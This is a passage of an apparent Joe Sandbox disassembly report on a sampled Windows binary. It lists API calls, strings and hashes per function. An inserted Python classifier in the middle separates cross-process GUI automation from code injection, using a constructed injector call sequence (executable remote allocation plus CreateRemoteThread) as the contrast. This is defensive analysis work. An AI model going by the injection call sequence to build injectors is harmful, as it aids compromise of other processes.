                                                    • Opcode Fuzzy Hash: 68f3f1f55b0ba5d50a6c658edf55d5c771681bce7628858bb885307ec5e6b49a
                                                    • Instruction Fuzzy Hash: 49F09032A42158BBE3205BA2DC0DEEF7B7DEFC6B11F00016AFA06D1050DBA05A0186B5
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 006B7243
                                                    • EnterCriticalSection.KERNEL32(?,?,00660EE4,?,?), ref: 006B7254
                                                    • TerminateThread.KERNEL32(00000000,000001F6,?,00660EE4,?,?), ref: 006B7261
                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00660EE4,?,?), ref: 006B726E
                                                      • Part of subcall function 006B6C35: CloseHandle.KERNEL32(00000000,?,006B727B,?,00660EE4,?,?), ref: 006B6C3F
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 006B7281
                                                    • LeaveCriticalSection.KERNEL32(?,?,00660EE4,?,?), ref: 006B7288
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: 3dae515c30cae7894b88b18786bc8f54e4419de2b9ee1289e4ccfa817ad18e2a
                                                    • Instruction ID: 19a3d990dd0fde9ab983614f5d539cd2a13c2457116ad6f9cc0a61c8ffaa0f2a
                                                    • Opcode Fuzzy Hash: 3dae515c30cae7894b88b18786bc8f54e4419de2b9ee1289e4ccfa817ad18e2a
                                                    • Instruction Fuzzy Hash: 0DF08276D42612EBD7512BA4ED4CADB773BFF45702B101533F543910A0CB765A41CB90
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006A899D
                                                    • UnloadUserProfile.USERENV(?,?), ref: 006A89A9
                                                    • CloseHandle.KERNEL32(?), ref: 006A89B2
                                                    • CloseHandle.KERNEL32(?), ref: 006A89BA
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 006A89C3
                                                    • HeapFree.KERNEL32(00000000), ref: 006A89CA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: 06624d57115b1533a490801758b82e2a62128cd789339399435d1315c771d1d4
                                                    • Instruction ID: 7bf567777ef715ef3411931ef5103153011a2bc78ea4188118cb080025d1ed8a
                                                    • Opcode Fuzzy Hash: 06624d57115b1533a490801758b82e2a62128cd789339399435d1315c771d1d4
                                                    • Instruction Fuzzy Hash: A0E0E536905001FBDB012FE5EC0C95ABF7AFF89322B119232F21AC1170CB329420DB90
                                                    APIs
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,006E2C7C,?), ref: 006A76EA
                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,006E2C7C,?), ref: 006A7702
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,006DFB80,000000FF,?,00000000,00000800,00000000,?,006E2C7C,?), ref: 006A7727
                                                    • _memcmp.LIBCMT ref: 006A7748
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FromProg$FreeTask_memcmp
                                                    • String ID: ,,n
                                                    • API String ID: 314563124-1563246951
                                                    • Opcode ID: d3ca5a81ae45c3d9c2ed8725e366284093a9845f76c0fb714b8016e3dd38b23e
                                                    • Instruction ID: 417dcb93781696575adc66c9d6079c3c605c16b2e7167ef643f383d7ba968538
                                                    • Opcode Fuzzy Hash: d3ca5a81ae45c3d9c2ed8725e366284093a9845f76c0fb714b8016e3dd38b23e
                                                    • Instruction Fuzzy Hash: C581EC75A00109EFCB04DFA4C984EEEB7BAFF89315F204559E516AB250DB71AE06CF60
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 006C8613
                                                    • CharUpperBuffW.USER32(?,?), ref: 006C8722
                                                    • VariantClear.OLEAUT32(?), ref: 006C889A
                                                      • Part of subcall function 006B7562: VariantInit.OLEAUT32(00000000), ref: 006B75A2
                                                      • Part of subcall function 006B7562: VariantCopy.OLEAUT32(00000000,?), ref: 006B75AB
                                                      • Part of subcall function 006B7562: VariantClear.OLEAUT32(00000000), ref: 006B75B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4237274167-1221869570
                                                    • Opcode ID: f4e5c3e2a61e11050fb0c39a573773ffab375a34811b426d72fad90042124f42
                                                    • Instruction ID: a53007943e7cadbdeb6a30866a0a7b452a8b2e9cdb3491e6e55f937b75ceb13b
                                                    • Opcode Fuzzy Hash: f4e5c3e2a61e11050fb0c39a573773ffab375a34811b426d72fad90042124f42
                                                    • Instruction Fuzzy Hash: 55916C71604341DFC750DF24C484E6AB7E6EF89714F14896EF89A8B361DB31E905CB92
                                                    APIs
                                                      • Part of subcall function 0066FC86: _wcscpy.LIBCMT ref: 0066FCA9
                                                    • _memset.LIBCMT ref: 006B2B87
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006B2BB6
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 006B2C69
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 006B2C97
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                    • String ID: 0
                                                    • API String ID: 4152858687-4108050209
                                                    • Opcode ID: ffb28cbdb38f431d6baaa305ea814cd54f4e3df607ac592859b70221949607c2
                                                    • Instruction ID: 386dbafd61cdba1f16441ec1540a44a37043e4f7582aaaebb3f2b43d2b099053
                                                    • Opcode Fuzzy Hash: ffb28cbdb38f431d6baaa305ea814cd54f4e3df607ac592859b70221949607c2
                                                    • Instruction Fuzzy Hash: 6851F0B15083029BD7A49F28C865AEF7BE6EF89310F044A2DF885D32D0DB70CD848796
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_free
                                                    • String ID: 3cf$_f
                                                    • API String ID: 2620147621-1617663849
                                                    • Opcode ID: 45393f6719d0d4143b5e8b3e86dc2490c01b81bb75c7d26ce5bf114de62f3fea
                                                    • Instruction ID: a4151c710ad60b7849b1744439703f1062cfd74bf7884c8ac124014096d4142d
                                                    • Opcode Fuzzy Hash: 45393f6719d0d4143b5e8b3e86dc2490c01b81bb75c7d26ce5bf114de62f3fea
                                                    • Instruction Fuzzy Hash: B8514A716083518FDB65CF28C991B6ABBE6AF85314F08882DE989D7351DB31E901CB92
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memset$_memmove
                                                    • String ID: 3cf$ERCP
                                                    • API String ID: 2532777613-1293920239
                                                    • Opcode ID: 907f5e22ce5a8ef4676971dadab6dbfe5dc89204bee9ff57d7180fc1377baf6c
                                                    • Instruction ID: 5aebc303d4b4182e4104ed7b2c4579125fc0cb628a06b8d433f32f49caf41c34
                                                    • Opcode Fuzzy Hash: 907f5e22ce5a8ef4676971dadab6dbfe5dc89204bee9ff57d7180fc1377baf6c
                                                    • Instruction Fuzzy Hash: 0951B171900305DBDB24DF65D891BEAB7EAEF44304F20856EE54AD7281E770EA45CB40
                                                    APIs
                                                      • Part of subcall function 006B14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006A9296,?,?,00000034,00000800,?,00000034), ref: 006B14E6
                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 006A983F
                                                      • Part of subcall function 006B1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006A92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006B14B1
                                                      • Part of subcall function 006B13DE: GetWindowThreadProcessId.USER32(?,?), ref: 006B1409
                                                      • Part of subcall function 006B13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,006A925A,00000034,?,?,00001004,00000000,00000000), ref: 006B1419
                                                      • Part of subcall function 006B13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,006A925A,00000034,?,?,00001004,00000000,00000000), ref: 006B142F
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006A98AC
                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006A98F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                    • String ID: @$@U=u
                                                    • API String ID: 4150878124-826235744
                                                    • Opcode ID: 57570a010b70e79185d75d3716ee28e0cb8d5e25899395e13b5449fd11a0d5a3
                                                    • Instruction ID: 2616045b9582ff045cbddf065d3ec4609ab389ea3f23792b17bbd29a4e066bdf
                                                    • Opcode Fuzzy Hash: 57570a010b70e79185d75d3716ee28e0cb8d5e25899395e13b5449fd11a0d5a3
                                                    • Instruction Fuzzy Hash: 93414176901118BFDB10DFA4CC51ADEBBB9EB06300F144159F945B7191DA716E85CFA0
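                                                     The API cluster listed above for the function whose SendMessageW calls sit at 006A983F, 006A98AC and 006A98F9 deserves a precise reading before it is counted as process injection. OpenProcess is requested with access mask 0x438, which decodes to PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION and does not include PROCESS_CREATE_THREAD. VirtualAllocEx is called with MEM_COMMIT (0x1000) and PAGE_READWRITE (0x4), not an executable protection. The WriteProcessMemory and ReadProcessMemory subcalls bracket SendMessageW with the tree-view messages 0x1104 (TVM_GETITEMRECT) and 0x1111 (TVM_HITTEST), whose lParam structures must live in the address space of the process that owns the control, which is why window-automation code that queries another process's list-view or tree-view controls needs exactly this set of memory primitives. Injection additionally needs an execution primitive such as CreateRemoteThread, SetThreadContext, QueueUserAPC or NtMapViewOfSection. The following Python script, added here as an example and not part of the Joe Sandbox report, parses API lines in the report's own format and applies that distinction: the first sample is this function's listing copied from above, the second is a constructed, hypothetical injector used only for contrast.

```python
import re

# Constructed sample: the API reference lines listed in this report for the function
# around 006A98xx (copied from the report's listing, not a separate capture).
REPORT_FUNCTION_APIS = """
Part of subcall function 006B14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006A9296,?,?,00000034,00000800,?,00000034), ref: 006B14E6
SendMessageW.USER32(?,00001104,00000000,00000000), ref: 006A983F
Part of subcall function 006B1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006A92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006B14B1
Part of subcall function 006B13DE: GetWindowThreadProcessId.USER32(?,?), ref: 006B1409
Part of subcall function 006B13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,006A925A,00000034,?,?,00001004,00000000,00000000), ref: 006B1419
Part of subcall function 006B13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,006A925A,00000034,?,?,00001004,00000000,00000000), ref: 006B142F
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006A98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006A98F9
"""

# Constructed contrast case (hypothetical, NOT from this report): the same memory
# primitives plus an executable allocation and a thread-creation primitive.
HYPOTHETICAL_INJECTOR_APIS = """
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00401000
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00401020
WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00401040
CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,00000000), ref: 00401060
"""

# One call in Joe Sandbox's "Api.MODULE(arg,arg,...), ref: addr" notation.
API_LINE = re.compile(r"(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)\((?P<args>[^)]*)\)")

MEMORY_PRIMS = {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory"}
EXEC_PRIMS = {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread",
              "SetThreadContext", "NtSetContextThread", "QueueUserAPC",
              "NtQueueApcThread", "NtMapViewOfSection"}

# Win32 process access rights (winnt.h) and common-control message ranges
# (LVM_FIRST = 0x1000 list view, TVM_FIRST = 0x1100 tree view, commctrl.h).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
LVM_FIRST, TVM_FIRST = 0x1000, 0x1100
PAGE_EXECUTE_MASK = 0xF0  # PAGE_EXECUTE .. PAGE_EXECUTE_WRITECOPY


def hexint(s):
    """Parse one sandbox argument; '?' means the sandbox did not recover the value."""
    try:
        return int(s, 16)
    except ValueError:
        return None


def parse_calls(text):
    return [(m.group("api"), m.group("mod"), [a.strip() for a in m.group("args").split(",")])
            for m in API_LINE.finditer(text)]


def decode_process_access(mask):
    return {name for bit, name in PROCESS_RIGHTS.items() if mask & bit}


def classify(text):
    calls = parse_calls(text)
    names = {api for api, _, _ in calls}
    rights, exec_alloc, msgs = set(), False, set()
    for api, _, args in calls:
        if api == "OpenProcess" and args:
            v = hexint(args[0])                      # dwDesiredAccess
            if v is not None:
                rights |= decode_process_access(v)
        elif api == "VirtualAllocEx" and len(args) > 4:
            v = hexint(args[4])                      # flProtect
            if v is not None and v & PAGE_EXECUTE_MASK:
                exec_alloc = True
        elif api.startswith("SendMessage") and len(args) > 1:
            v = hexint(args[1])                      # Msg
            if v is not None:
                msgs.add(v)
    mem, execp = names & MEMORY_PRIMS, names & EXEC_PRIMS
    # List/tree-view item messages carry an lParam pointer that must lie in the
    # control owner's process; automation code therefore allocates, writes and
    # reads remote memory around them without ever needing to run code there.
    control_msgs = any(LVM_FIRST <= m < TVM_FIRST + 0x100 for m in msgs)
    if "WriteProcessMemory" in mem and execp:
        verdict = "injection"
    elif "WriteProcessMemory" in mem and exec_alloc:
        verdict = "remote-executable-write"
    elif mem >= {"VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory"} and control_msgs:
        verdict = "cross-process-control-read"
    elif mem:
        verdict = "remote-memory-access"
    else:
        verdict = "none"
    return {"verdict": verdict, "memory_apis": sorted(mem), "exec_apis": sorted(execp),
            "process_rights": sorted(rights), "executable_alloc": exec_alloc,
            "messages": sorted(msgs)}


if __name__ == "__main__":
    for label, sample in (("report function", REPORT_FUNCTION_APIS),
                          ("hypothetical injector", HYPOTHETICAL_INJECTOR_APIS)):
        print(label, classify(sample))
```

                                                     The verdict for the report's listing is "cross-process-control-read" with no execution primitive and a non-executable allocation, while the constructed injector is classified as "injection" because it requests PROCESS_CREATE_THREAD, allocates PAGE_EXECUTE_READWRITE memory and calls CreateRemoteThread. The sandbox's injection-related signatures therefore have to rest on functions other than this one, and a detection rule that fires on the memory primitives alone will also fire on legitimate GUI automation.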
                                                    APIs
                                                    • _memset.LIBCMT ref: 006B27C0
                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 006B27DC
                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 006B2822
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00715890,00000000), ref: 006B286B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem_memset
                                                    • String ID: 0
                                                    • API String ID: 1173514356-4108050209
                                                    • Opcode ID: ea5966cb52cb201f82e5c098d4d87821c85a1e50063def5888e2aaea0d31265c
                                                    • Instruction ID: d9c776e45f497140f6f2718995c5ea6d7789c25c2449738aae7799fd50dc24ae
                                                    • Opcode Fuzzy Hash: ea5966cb52cb201f82e5c098d4d87821c85a1e50063def5888e2aaea0d31265c
                                                    • Instruction Fuzzy Hash: 6E41B2B06043029FD720DF24DC94B9ABBEAEF85314F044A2DF96697392D730E949CB56
                                                    APIs
                                                    • ClientToScreen.USER32(?,?), ref: 006DAB60
                                                    • GetWindowRect.USER32(?,?), ref: 006DABD6
                                                    • PtInRect.USER32(?,?,006DC014), ref: 006DABE6
                                                    • MessageBeep.USER32(00000000), ref: 006DAC57
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID: hW
                                                    • API String ID: 1352109105-1300829777
                                                    • Opcode ID: 35041d8dc1731841c2a54437166b0f3bd49ae59b90da81f8ffac4f1379b2a030
                                                    • Instruction ID: b737a87de2b5e0ecabb53f17e9dd6d467bb066926dd89a1c6e86dfb47a223c43
                                                    • Opcode Fuzzy Hash: 35041d8dc1731841c2a54437166b0f3bd49ae59b90da81f8ffac4f1379b2a030
                                                    • Instruction Fuzzy Hash: A1416034E14119DFCB25DF98D884BA97BF6FB49320F1880AAE4159B361D730E942CB92
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 006CD7C5
                                                      • Part of subcall function 0065784B: _memmove.LIBCMT ref: 00657899
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower_memmove
                                                    • String ID: cdecl$none$stdcall$winapi
                                                    • API String ID: 3425801089-567219261
                                                    • Opcode ID: e77379db521bc433194a0ac2d2c2aded6dd32a862bb058be5cb8afa8aad8e805
                                                    • Instruction ID: 9bf6d8a586d87acf1ad34adf2205887f3e649376979c7691359281a83d0f0f59
                                                    • Opcode Fuzzy Hash: e77379db521bc433194a0ac2d2c2aded6dd32a862bb058be5cb8afa8aad8e805
                                                    • Instruction Fuzzy Hash: 5B318E71905219ABDF00EF54CC51AFEB3B6FF04720F10862DE865976D2DB31A905CB90
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006C184C
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006C1872
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006C18A2
                                                    • InternetCloseHandle.WININET(00000000), ref: 006C18E9
                                                      • Part of subcall function 006C2483: GetLastError.KERNEL32(?,?,006C1817,00000000,00000000,00000001), ref: 006C2498
                                                      • Part of subcall function 006C2483: SetEvent.KERNEL32(?,?,006C1817,00000000,00000000,00000001), ref: 006C24AD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 3113390036-3916222277
                                                    • Opcode ID: 34ccf4dbd180e5551ef0015a118a4548d300003ac215eaad6c62761484ad38b9
                                                    • Instruction ID: 5759cd2188eadbe53576af421d443513a7282a0f7829da99b5b563bc9091017f
                                                    • Opcode Fuzzy Hash: 34ccf4dbd180e5551ef0015a118a4548d300003ac215eaad6c62761484ad38b9
                                                    • Instruction Fuzzy Hash: 5821AFB1505209BFEB11AB60DC85FFB77EEEB4A744F10412EF9059A241DA208E0557A4
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • GetCursorPos.USER32(?), ref: 006DC4D2
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0068B9AB,?,?,?,?,?), ref: 006DC4E7
                                                    • GetCursorPos.USER32(?), ref: 006DC534
                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0068B9AB,?,?,?), ref: 006DC56E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
